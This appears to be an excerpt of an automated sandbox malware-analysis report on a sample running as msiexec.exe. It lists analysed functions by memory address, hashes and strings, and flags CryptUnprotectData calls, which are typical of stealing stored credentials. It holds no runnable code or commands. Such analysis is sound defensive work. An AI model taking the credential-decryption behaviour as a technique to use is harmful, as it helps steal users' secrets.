Instruction Fuzzy Hash: 8AD05BB181C3D96FC7428A2248156563EF05B162A975504DBC155EA553E216EC029751

Analysis Process: msiexec.exePID: 5400, Parent PID: 3348COMMON

Execution Graph

Execution Coverage:	8.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	21.4%
Total number of Nodes:	28
Total number of Limit Nodes:	2

Executed Functions

Function 27489999 Relevance: 1.6, APIs: 1, Instructions: 57
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 27489A05

Memory Dump Source

Source File: 00000007.00000002.2774655488.0000000027480000.00000040.00000800.00020000.00000000.sdmp, Offset: 27480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27480000_msiexec.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: 781ed8dc3ed5974bd5a69c797a21f6802b31da02c00bf7b12d25fc4bc1238e0f
Instruction ID: 6e8641e211ee464b11cbe0b5c5066af821b11f40405095b126caf8382a5869e8
Opcode Fuzzy Hash: 781ed8dc3ed5974bd5a69c797a21f6802b31da02c00bf7b12d25fc4bc1238e0f
Instruction Fuzzy Hash: D0116776800249DFDB11CF99C844BEEBFF4EF48320F14841AEA54A7210C379A550CFA1

Function 27489350 Relevance: 1.6, APIs: 1, Instructions: 55
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 27489A05

Memory Dump Source

Source File: 00000007.00000002.2774655488.0000000027480000.00000040.00000800.00020000.00000000.sdmp, Offset: 27480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27480000_msiexec.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: 53e93e9f6a77f90db09f63c68c93bd791333a0d87905f300dab8a6abee4b562b
Instruction ID: 9353d33a421fc27882ed10cc1af96f0c9963cfb12b06fdf2fa32ed877403c9cf
Opcode Fuzzy Hash: 53e93e9f6a77f90db09f63c68c93bd791333a0d87905f300dab8a6abee4b562b
Instruction Fuzzy Hash: AD1126B680064DDFDB10CF99D944BEEBBF4EB48320F14845AE954A7210D379A550CFA5

Function 006BB328 Relevance: .4, Instructions: 362
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.2754577625.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6b0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 388083d3680b68416bba92f9591c73948a59902546f86e7f8e6d8a2c140b5c61
Instruction ID: b382d0b448dda04c45ed10dcfcc7da25115b1d5bbcaf89db6e9a8e3d9afe33e1
Opcode Fuzzy Hash: 388083d3680b68416bba92f9591c73948a59902546f86e7f8e6d8a2c140b5c61
Instruction Fuzzy Hash: 2BE1FBB5A00218CFDB14CFA9D984ADDBBF2FF49310F159069E805AB366DB709D81CB50

Function 27488608 Relevance: .3, Instructions: 296
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.2774655488.0000000027480000.00000040.00000800.00020000.00000000.sdmp, Offset: 27480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27480000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 404c72517d9fe5bc99e4cdc988dc01f623c70ca9f87179d538433825b5c5ce96
Instruction ID: 17227c881b09063687c157cb28dc444a70f1deb853d7cf0a6b37bcc479a7dea7
Opcode Fuzzy Hash: 404c72517d9fe5bc99e4cdc988dc01f623c70ca9f87179d538433825b5c5ce96
Instruction Fuzzy Hash: B1E1B0B4E01218CFEB64DFA5C854BDDBBB2BF89304F2081AAD409A7391DB355A85CF54

Function 274511C0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2774425452.0000000027450000.00000040.00000800.00020000.00000000.sdmp, Offset: 27450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27450000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 525d74b42ee2003068c5abacf218d6dfb2df258ce7bed592c38243cb4ee2b5a5
Instruction ID: 58c86ea33a8737cb25acd604637721d71a8abbb083830b6bce5b2753754676bf
Opcode Fuzzy Hash: 525d74b42ee2003068c5abacf218d6dfb2df258ce7bed592c38243cb4ee2b5a5
Instruction Fuzzy Hash: 6BC19174E00218CFDB54DFA5C994B9DBBB2BF89301F2081AAD809AB355DB359E85CF50

Function 27450040 Relevance: .3, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.2774425452.0000000027450000.00000040.00000800.00020000.00000000.sdmp, Offset: 27450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27450000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1f0d993303705e137b5daffe62a77dca0cada67f83f643feab45b5f8c3e9b3e
Instruction ID: 69a63de3dba8f713433b544a852bdbe02ff0cb70de0c37a58d3a2a37257f425c
Opcode Fuzzy Hash: b1f0d993303705e137b5daffe62a77dca0cada67f83f643feab45b5f8c3e9b3e
Instruction Fuzzy Hash: E7C19174E00218CFDB54DFA5C994B9DBBB2BF89300F2081A9D809AB355DB359E85CF50

Function 2745E058 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2774425452.0000000027450000.00000040.00000800.00020000.00000000.sdmp, Offset: 27450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27450000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dccf5bd9e0e37ce410892e45db1d21ad0ad3892f1022eea9aa614e2f3c14f723
Instruction ID: eae52729bb686ddad381e1b3849343de6ef9408687c7998b820d893e4fba02f1
Opcode Fuzzy Hash: dccf5bd9e0e37ce410892e45db1d21ad0ad3892f1022eea9aa614e2f3c14f723
Instruction Fuzzy Hash: 89C19074E00218CFDB54DFA5C994B9DBBB2BF89304F2081AAD409AB395DB359E85CF50

Function 27451610 Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2774425452.0000000027450000.00000040.00000800.00020000.00000000.sdmp, Offset: 27450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27450000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02f9473d227770fd2ea8cfb5e24c0d3267cc87824483aac6681433d47b7d2fc0
Instruction ID: 6855a0b62bdab041c365c78beaee4ca016d04b5a9c5ed7f029f0c29b4bce9e27
Opcode Fuzzy Hash: 02f9473d227770fd2ea8cfb5e24c0d3267cc87824483aac6681433d47b7d2fc0
Instruction Fuzzy Hash: A6A1E070A00218CFEB14DFA9C884BDDBBB1FF89314F208269E459AB391DB749985CF55

Function 27451620 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2774425452.0000000027450000.00000040.00000800.00020000.00000000.sdmp, Offset: 27450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27450000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c80dc46b935931df87db49d23c8fbee8571626abae2c0b9f1ad63ed7dbe8a6a
Instruction ID: 3f423c970bb626679373ffc5f57673677bd689705df50d831da90146aea54043
Opcode Fuzzy Hash: 3c80dc46b935931df87db49d23c8fbee8571626abae2c0b9f1ad63ed7dbe8a6a
Instruction Fuzzy Hash: 2BA1D170900208CFEB24DFA9C884BDDBBB1BF89314F208269E459AB391DB749985CF55

Function 27451966 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2774425452.0000000027450000.00000040.00000800.00020000.00000000.sdmp, Offset: 27450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27450000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d92c723c7502f308afac3d91f11237972a626cabc8693429d23f6e435bb4ada7
Instruction ID: f4d6fbc3b34d323f0f64865767414286c979045bda93e48f260e587348ff3df3
Opcode Fuzzy Hash: d92c723c7502f308afac3d91f11237972a626cabc8693429d23f6e435bb4ada7
Instruction Fuzzy Hash: 3E91DF74900218CFEB14DFA8C884BDCBBB1FF89314F209269E459BB291EB749985CF55

Function 006BBEB0 Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2754577625.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6b0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 192c4109eb2193c5b0de5ff73b028cfbe541e46f368d582ae92de1dc2b025663
Instruction ID: a9403bc4c5241291df8bcbf4db1f27f8be90e86f83767733e30086da593a4452
Opcode Fuzzy Hash: 192c4109eb2193c5b0de5ff73b028cfbe541e46f368d582ae92de1dc2b025663
Instruction Fuzzy Hash: 1C81C3B4E00218CFDB54DFA9D984ADDBBF2BF89310F14806AE409AB361DB319985DF10

Function 006BBBD2 Relevance: .2, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2754577625.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6b0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 584942db263c2bab9baf881432c319a6a6820128315662c0c8168e2a08712445
Instruction ID: cac529c282576223d9609ee16e50d95a06511508ac91f2a321704ad5b0245b83
Opcode Fuzzy Hash: 584942db263c2bab9baf881432c319a6a6820128315662c0c8168e2a08712445
Instruction Fuzzy Hash: 4481B4B4E00258CFDB54DFA9D984ADDBBF2BF89300F249069E409AB361DB749981DF10

Function 006BC190 Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2754577625.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6b0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46ff01bf4f071587eb219efe36b6adc2ce47f1556e49efdb1dec64afd6cb76a6
Instruction ID: 1b15cbb4f6f568c8f0048120c7c28571ce0f00a82396ad0c3d4295e8e91365c4
Opcode Fuzzy Hash: 46ff01bf4f071587eb219efe36b6adc2ce47f1556e49efdb1dec64afd6cb76a6
Instruction Fuzzy Hash: BC8193B4E00258CFDB54DFA9D984ADDBBF2BF89310F148069E409AB361DB309A81DF50

Function 006BCA32 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2754577625.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6b0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d392628d2fea473af8b05380f0eb35173115d4db27f2b789dd61a0aa86d67bd
Instruction ID: c4d8b63cd91cf301c1b58606c8c90cc9b1017ca5ea1304f1e8d194e0033901c0
Opcode Fuzzy Hash: 9d392628d2fea473af8b05380f0eb35173115d4db27f2b789dd61a0aa86d67bd
Instruction Fuzzy Hash: 6A81A3B4E00218DFDB14DFA9D984ADDBBF2BF89310F148069E419AB365DB309981DF50

Function 006B4AD9 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2754577625.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6b0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3eb132548383172d05246984f542d53353375c8a6c6c13fbb45dba6e6a0f2c7
Instruction ID: ba418dfb7ce58c0561aee4318efc15ce98b5b175387d15be5d9972aafb6a94f2
Opcode Fuzzy Hash: c3eb132548383172d05246984f542d53353375c8a6c6c13fbb45dba6e6a0f2c7
Instruction Fuzzy Hash: 2B8192B4E01218DFDB54DFA9D984ADDBBF2BF89300F14806AE419AB365DB349981CF50

Function 006BC470 Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2754577625.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6b0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c67369f413b2e33d5fdad3e4b5738a0a4400f1c34b56a5b2bd1819e9f56a0585
Instruction ID: 37e0d4267bdcb22706616d012b97a6adf2fe1fa072ee10f1f6233c120e0bb7ca
Opcode Fuzzy Hash: c67369f413b2e33d5fdad3e4b5738a0a4400f1c34b56a5b2bd1819e9f56a0585
Instruction Fuzzy Hash: 4581A3B5E00218CFDB54DFA9D984ADDBBF2BF89310F149069E419AB361DB309A81CF50

Function 006BC752 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2754577625.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6b0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 429a02bea7bda973cf55ee5bdb58ed374c50b3e73541945e3054022dcc8ea3e4
Instruction ID: 7b7bc0911dc8faaab2792896cd51371307a3dd773a6ef4d7b52077215c97800e
Opcode Fuzzy Hash: 429a02bea7bda973cf55ee5bdb58ed374c50b3e73541945e3054022dcc8ea3e4
Instruction Fuzzy Hash: 1981A5B4E00218DFEB54DFA9D944ADDBBF2BF89310F148069E419AB365DB309981DF50

Function 27450012 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2774425452.0000000027450000.00000040.00000800.00020000.00000000.sdmp, Offset: 27450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27450000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c60dd6b99b8c0e0791920253588979459ffd0f80e394aaaa96dff4bb2a45f945
Instruction ID: 8f8a1551ee9832d793b81ced5a192dd10b486692e869e94beb6f870cd30c6d92
Opcode Fuzzy Hash: c60dd6b99b8c0e0791920253588979459ffd0f80e394aaaa96dff4bb2a45f945
Instruction Fuzzy Hash: 6A411675D05248CFEB08CFA6D8556DDBBB2FF8A300F20C16AC418AB265EB385946CF51

Function 2745E049 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2774425452.0000000027450000.00000040.00000800.00020000.00000000.sdmp, Offset: 27450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27450000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd28ac86e1440938d6902c13dfe2eebd8a9cf8d7add1b987d43c806d3556d86e
Instruction ID: 8331ffe6841d54f12492e0b5617af18f0c9a44fdc6b0a296678bfab2626e25b7
Opcode Fuzzy Hash: fd28ac86e1440938d6902c13dfe2eebd8a9cf8d7add1b987d43c806d3556d86e
Instruction Fuzzy Hash: 7C41D170E01658CBDB18CFAAD9906DEFBF2AF99300F20D12AC418AB255DB345946CF54

Function 274511B0 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2774425452.0000000027450000.00000040.00000800.00020000.00000000.sdmp, Offset: 27450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27450000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c3b713e4e83a9c6a9c027a82f8907a03986c5d85f9c5b7500f974f208f0f94a
Instruction ID: 375a785f5538d17f48b1b28d87dfc67ec7b61bdfef6a48f324d90ddaec7d6faa
Opcode Fuzzy Hash: 7c3b713e4e83a9c6a9c027a82f8907a03986c5d85f9c5b7500f974f208f0f94a
Instruction Fuzzy Hash: F141B174D01608DFEB18CFAAD5546DDBBF2BB89300F20C12AD419BB255EB385946CF54

Function 006B0CA0 Relevance: 11.6, Strings: 9, Instructions: 395
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4hW$, xrefs: 006B0D1F
4hW$, xrefs: 006B0DD9
4hW$, xrefs: 006B0DBA
4hW$, xrefs: 006B0D5D
4hW$, xrefs: 006B0D9B
4hW$, xrefs: 006B0D3E
4hW$, xrefs: 006B0D7C
(_$, xrefs: 006B145A
4hW$, xrefs: 006B0D00

Memory Dump Source

Source File: 00000007.00000002.2754577625.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6b0000_msiexec.jbxd

Similarity

API ID:
String ID: (_$$4hW$$4hW$$4hW$$4hW$$4hW$$4hW$$4hW$$4hW$
API String ID: 0-199120438
Opcode ID: d80749dc2eb41f73333735f3484d2b2f2c334be68f5ff06c0810b20489d2bc2b
Instruction ID: d6375384609430894dc4ac1208e30004da4ed611b14267634d4d5125c43a1d0b
Opcode Fuzzy Hash: d80749dc2eb41f73333735f3484d2b2f2c334be68f5ff06c0810b20489d2bc2b
Instruction Fuzzy Hash: AB22B4B4910219CFDB54DF64DC94A9DBBB2FF89311F1082AAD40AA7354DB38AD85CF81

Function 006B4DC8 Relevance: 5.1, Strings: 4, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0~W$, xrefs: 006B4DF6
0~W$, xrefs: 006B4EA9
0~W$, xrefs: 006B4DD9
0~W$, xrefs: 006B4E13

Memory Dump Source

Source File: 00000007.00000002.2754577625.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6b0000_msiexec.jbxd

Similarity

API ID:
String ID: 0~W$$0~W$$0~W$$0~W$
API String ID: 0-4181065373
Opcode ID: 442c3ba73cc62aa604f16e223aea83b5b3096c834589b08edb691159fa32c78d
Instruction ID: 6de5df52bba0b958915cdcf1462947ad2d3abaeafd92ff80be22722624bb8665
Opcode Fuzzy Hash: 442c3ba73cc62aa604f16e223aea83b5b3096c834589b08edb691159fa32c78d
Instruction Fuzzy Hash: B631A271204109AFCB059F64D844AEE3BA7FB88300F108429F845D7342DF38CD62DBA1

Function 006B5A60 Relevance: 2.6, Strings: 2, Instructions: 81
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0~W$, xrefs: 006B5AFA
0~W$, xrefs: 006B5B17

Memory Dump Source

Source File: 00000007.00000002.2754577625.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6b0000_msiexec.jbxd

Similarity

API ID:
String ID: 0~W$$0~W$
API String ID: 0-1481759930
Opcode ID: cb2d07fbde0d318718998f5f88aa1e4dc3b592cdd4a169a937392a44b299646c
Instruction ID: 979ca8c90cc44a0feddb1b0ad91489ec5e937210eba50588da8e2fc5f201bfb9
Opcode Fuzzy Hash: cb2d07fbde0d318718998f5f88aa1e4dc3b592cdd4a169a937392a44b299646c
Instruction Fuzzy Hash: C121D031310A119FD3299A28C8A4AAEBBA7FFC97107148179F847EB355DF24DC0287D0

Function 006B5C08 Relevance: 1.5, Strings: 1, Instructions: 232
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0~W$, xrefs: 006B5E5E

Memory Dump Source

Source File: 00000007.00000002.2754577625.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6b0000_msiexec.jbxd

Similarity

API ID:
String ID: 0~W$
API String ID: 0-1190743461
Opcode ID: 250bd4666feb3db16d4f0768df69c17b47a79cdbc0d696588520de890def6101
Instruction ID: 0854dd51ca8f16f5074e944cd852a681350b09f96e66f2a36383e54bd0239a93
Opcode Fuzzy Hash: 250bd4666feb3db16d4f0768df69c17b47a79cdbc0d696588520de890def6101
Instruction Fuzzy Hash: 3C817EB1A00A05DFDB54DF69C488BE9BBB3BF89310B248169D406EB361D731ED82CB51

Function 274522A8 Relevance: 1.5, Strings: 1, Instructions: 226
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 274523A5

Memory Dump Source

Source File: 00000007.00000002.2774425452.0000000027450000.00000040.00000800.00020000.00000000.sdmp, Offset: 27450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27450000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: eb70b12ecc94a396f8b8c43fc508a6e049ce90b872168c9f75e47934b9f2b44b
Instruction ID: 08b166f63b27b44929293b08c2baa78bd5f5b79ea31ec939235f885d52d82d4b
Opcode Fuzzy Hash: eb70b12ecc94a396f8b8c43fc508a6e049ce90b872168c9f75e47934b9f2b44b
Instruction Fuzzy Hash: 4281E370B04214DBDB149F7884986AE36A3EBC5360F20862AFD56AB3D1DF748D81CB91

Function 006B5A70 Relevance: 1.3, Strings: 1, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0~W$, xrefs: 006B5AFA

Memory Dump Source

Source File: 00000007.00000002.2754577625.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6b0000_msiexec.jbxd

Similarity

API ID:
String ID: 0~W$
API String ID: 0-1190743461
Opcode ID: 993c046e3659f612d13f462cf547477aaa8071ac103cc5d5a447c51ec8e29d6e
Instruction ID: 9474d098ffe7562b8f7a8f282fed6e2d420c4b5705841ec9b21048ddeede1961
Opcode Fuzzy Hash: 993c046e3659f612d13f462cf547477aaa8071ac103cc5d5a447c51ec8e29d6e
Instruction Fuzzy Hash: 4611A131300A119FC7299A29C8A8AAEBBABFFC87517154179F907EB350DF24DC4287D0

Function 006B5EA8 Relevance: 1.3, Strings: 1, Instructions: 16
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

1Y$, xrefs: 006B5EA8

Memory Dump Source

Source File: 00000007.00000002.2754577625.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6b0000_msiexec.jbxd

Similarity

API ID:
String ID: 1Y$
API String ID: 0-2375177337
Opcode ID: 60f30f38822afd3e523177ef5f9699dab960d2bade033374ab4b3111c17f39a5
Instruction ID: e43adf2f77db31ea27c92fea17689ac872e51382111dc6b898bd153fde46da34
Opcode Fuzzy Hash: 60f30f38822afd3e523177ef5f9699dab960d2bade033374ab4b3111c17f39a5
Instruction Fuzzy Hash: 09D05EB05383858FD306F770E9168593B36BAC6304B8485AAF4884E21BFEBC4E158793

Function 006B56A8 Relevance: .3, Instructions: 329
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.2754577625.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6b0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 571122bc5c66e479fc856732845df8042f4dc6319b05b93a3d5b2e9e1b979fbb
Instruction ID: 9dce5e51dbc5dd39c7aadaf91bf9a7c14eba7cfdebafb096865abe1662d4e8e4
Opcode Fuzzy Hash: 571122bc5c66e479fc856732845df8042f4dc6319b05b93a3d5b2e9e1b979fbb
Instruction Fuzzy Hash: 0DB1BEB17046109FDB159B68C898BEA7BA7FBC8310F148529E5479B391EF78CC81DB90

Function 27452990 Relevance: .3, Instructions: 269
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.2774425452.0000000027450000.00000040.00000800.00020000.00000000.sdmp, Offset: 27450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27450000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99575d248d60d3b38229ce91bedf5d99132aec5648a22c442389e6bb4c0ff044
Instruction ID: 7d584b8573b63082b0e577f70168932201cd0ab531a3b8db75a43d0bc08b6218
Opcode Fuzzy Hash: 99575d248d60d3b38229ce91bedf5d99132aec5648a22c442389e6bb4c0ff044
Instruction Fuzzy Hash: 5E918D757002048FD704DB68C491AEE7BF7EFC9320F244569E906EB3A2DA71DD418BA1

Function 274532AF Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2774425452.0000000027450000.00000040.00000800.00020000.00000000.sdmp, Offset: 27450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_27450000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a40ac7c787f7015c2c1b3d08bbc8514f1dd6ac244cfd8e2606d97572f2dfaab
Instruction ID: 801c810fec5ea23032302608e9eafe22de443187167a78d875873af84417fa3e
Opcode Fuzzy Hash: 8a40ac7c787f7015c2c1b3d08bbc8514f1dd6ac244cfd8e2606d97572f2dfaab
Instruction Fuzzy Hash: 91510172A04305AFC704DB69E841ADEBBF9FBD932CB10856EE518D7341EA31D80687A0

Function 006BCEC7 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2754577625.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6b0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5af9db6fdf56400cc7d6ead61557e740c6f3475373d291bd02b7288da22f7c0b
Instruction ID: 62e038bf51a3c8495e361102c98f914631d9a30bdccf3160e001929e1b739666
Opcode Fuzzy Hash: 5af9db6fdf56400cc7d6ead61557e740c6f3475373d291bd02b7288da22f7c0b
Instruction Fuzzy Hash: 2F51DEB00617529FD7402F20D9AC12EBBA2FB0F3277007E25F18FA50A1EB796049CB21

Function 006BCED8 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2754577625.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6b0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d4ba2c1161254e37685516d0bf1115c8a206309fbea7b4a79fece49abf8e882
Instruction ID: 97ea890bed16d0e416c6f929f41ad11f8f661a16772b1d77403b6c874bc3e001
Opcode Fuzzy Hash: 5d4ba2c1161254e37685516d0bf1115c8a206309fbea7b4a79fece49abf8e882
Instruction Fuzzy Hash: E851BCB00616579FD7402F20D9AC52EBBA6FB4F3237007E25F18FA50A0EB796049CB20

Function 006BCD10 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2754577625.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6b0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fba4a71ac890bf2177f67c1afb87922dfd2754ea3950af26fb9dbf694a19b0ab
Instruction ID: 5efbc78c7494e2954a54fff84c97e4e4f68b289cf39ab277f60cb73812fecf81
Opcode Fuzzy Hash: fba4a71ac890bf2177f67c1afb87922dfd2754ea3950af26fb9dbf694a19b0ab
Instruction Fuzzy Hash: 42519374E01218DFDB44DFA9D9849DDBBF2BF89310F24816AE819AB365DB309901CF50

Function 006B3908 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2754577625.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6b0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92ddeccd068a9cf564b62842168d64c18d0ca1eae6af106dbf4d20bc445bf33a
Instruction ID: 84118fe9f4b510efa3b7f79708398885fce48959bf1112ad30befb30353c5ab7
Opcode Fuzzy Hash: 92ddeccd068a9cf564b62842168d64c18d0ca1eae6af106dbf4d20bc445bf33a
Instruction Fuzzy Hash: A951B9B5E01208CFCB48DFA9D8909DDBBB2FF89300B609069E805AB364DB359D45CF50

Function 006BA650 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2754577625.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6b0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb447c3be8ee35ca4673a09eac58cf6df2ad0d3d3b7aa0f4e313dcf1f871fece
